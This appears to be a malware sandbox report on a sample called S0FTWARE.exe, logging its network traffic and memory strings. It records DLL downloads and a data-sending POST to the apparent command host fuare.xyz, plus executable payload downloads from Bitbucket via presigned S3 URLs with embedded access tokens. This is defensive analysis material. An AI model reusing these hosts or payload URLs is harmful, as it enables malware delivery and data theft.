                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732199177&P2=404&P3=2&P4=S%2fDMU7bCQ%2fUcrfbaKo5rz8U9dz0MCzP5ofjnHfrGaxK8ErtvWEbZxqsR1lYx2Af08PoA4aAnZDyElailtrjESw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: C0uqo8vFe1xTufpnD76ikNSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /jhg1a/yujth/downloads/NewApp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: bitbucket.orgCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /11775b90-6f69-4884-847d-757e205605be/downloads/08b6d961-2cc7-4641-9f33-146b04169e8f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNI2VJZ3YN&Signature=9IsFErXJsqs0tpcA8pBBfOEMZlU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJHMEUCIQDrU%2Biy0SAH5tqalsyFBagoc1kfdg7MAL4LTeKLZfW7fAIgYN5hZAlvhbxNlEWFoE5P47K08myL3CMPWKphpCUDzdkqsAII8P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDByhjIF16%2F%2BR79Z6sCqEAoYYxIHs3MaGKPTDy%2F1pP7DcUzEObRIi4W%2BleEaqVGr6uO5uw6TKmjx6hAlakaDJq3wXadqsM8WqZFsQ%2FxATIXbljhq1ZHCzYgjU5xmyBt7Z%2FAOENOyqsRaR61RJFaMW1w61daCKj%2FBQC8mJmadE6aczB3KXJyJFy906hV8vTFfiArES9OHqkjZp7ppefO3I8KND9Ug8c1PmPhCvmzcD6llNfNVTMvSCAGbKHcAFYm%2F2roYTCce1WpgsmMIpHbP0lkcRyiWQMCGowLKawtWcVyBeNfN2panrTOeE7T6ciyjsDjF1C5b8uhB2jywnZvLT9EAJqkQR4H9LccDrPEZg26UQYTiyMKmR2LkGOp0BsBQSdZibwlMfuLK%2FerADLggjWr5OYo0DlYGURT%2BfZVkkBTSzvdOO1VYavxFAVUi0hE%2FUv0ghL7OYBA9128S%2FK%2FvufMqn0Bl3%2B9SrGJlAy6T6ciYdS5baULlxfWUDItdkdNOAJL96mTn52c5l%2ByZ9rBVWW%2F7eR7nT5cdfNiwXCHqM%2Fo4GDmn7%2BNnEZAQV4irmK7%2BhcfUdjN5DwY2aUQ%3D%3D&Expires=1731596210 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /jhg1a/yujth/downloads/Updater.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: bitbucket.orgCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /11775b90-6f69-4884-847d-757e205605be/downloads/bdcb8c2b-056c-4c51-82db-773796c63469/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOGQUBCOB&Signature=LQD6OSo%2FQqLL%2BqhVbUtUrhb8AwY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJHMEUCIQCYL%2FIr457%2BJHjf%2BCW9uyibyLJPAi0WdhOi3c4K%2F1kTMQIgNE0WSWLJOhUG51RYqBOrOrLJOowLfJQLhtoe14xz4%2FcqsAII8P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDHwYPqBIbx9aG%2BJEXiqEAgD6JVGyeeHH9SOCtf0929BkPGpNVJiPuesarSRyM1IHXarvPzVgRsR5i2apJOM6L3Sw1%2FhC62PiHMatqH7h8N%2FX%2BjJePY6a29v8oOk1I4VkMpPRz1TEa5A9BpM0lfi0H%2BqM1VnkPCDsaBinrp73FoTWoCwcBXPZB3jDaYCzBrhXl30n5r5yeNFNKbRW5DglOBjKk%2B4Knol%2BbduyzastaSfO7NMSJA7VzZWRj1eTpVSGeACjd27ehFCSuc5BcO72TAyPN%2BRi4WqWz%2FHjyCD6YEHj0e1tVrWEDdUuqhoxxfGFHiUiGG00FsVOA%2F770hGS51wdY%2FE%2FxwQwczmGGpEIUdWn2p04MLWR2LkGOp0BqGBcsuvyiQwhxY62OPl4Bls2yGPVO4OEMgA8o1Xbk0nwJOZ7pOtPH8o3baJBFIfAHeI436BZxgg3tzNYqcIMn60718eAmDWgYWK1SjSP%2BmYdcjqQQxDrd%2B5LqISd79mLUgkKSXRYpdudl2CmVhlkVFZiyYZ%2B%2FSVzg11fenM0fvEgsa9kOSGoNk2mpf%2Bb4wI76lf%2FItncBrWCT2f1YQ%3D%3D&Expires=1731596222 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000003.2653607208.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653714391.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653771059.000007C000F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                        Source: chrome.exe, 00000005.00000003.2653607208.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653714391.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653771059.000007C000F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/) equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                        Source: global trafficDNS traffic detected: DNS query: t.me
                        Source: global trafficDNS traffic detected: DNS query: fuare.xyz
                        Source: global trafficDNS traffic detected: DNS query: www.google.com
                        Source: global trafficDNS traffic detected: DNS query: apis.google.com
                        Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                        Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                        Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                        Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                        Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                        Source: global trafficDNS traffic detected: DNS query: c.msn.com
                        Source: global trafficDNS traffic detected: DNS query: api.msn.com
                        Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                        Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: S0FTWARE.exe, 00000000.00000002.2233426757.0000000001C9E000.00000008.00000001.01000000.00000003.sdmp, S0FTWARE.exe, 00000000.00000000.2022629445.0000000001C9E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                        Source: S0FTWARE.exe, 00000000.00000002.2233426757.0000000001C9E000.00000008.00000001.01000000.00000003.sdmp, S0FTWARE.exe, 00000000.00000000.2022629445.0000000001C9E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
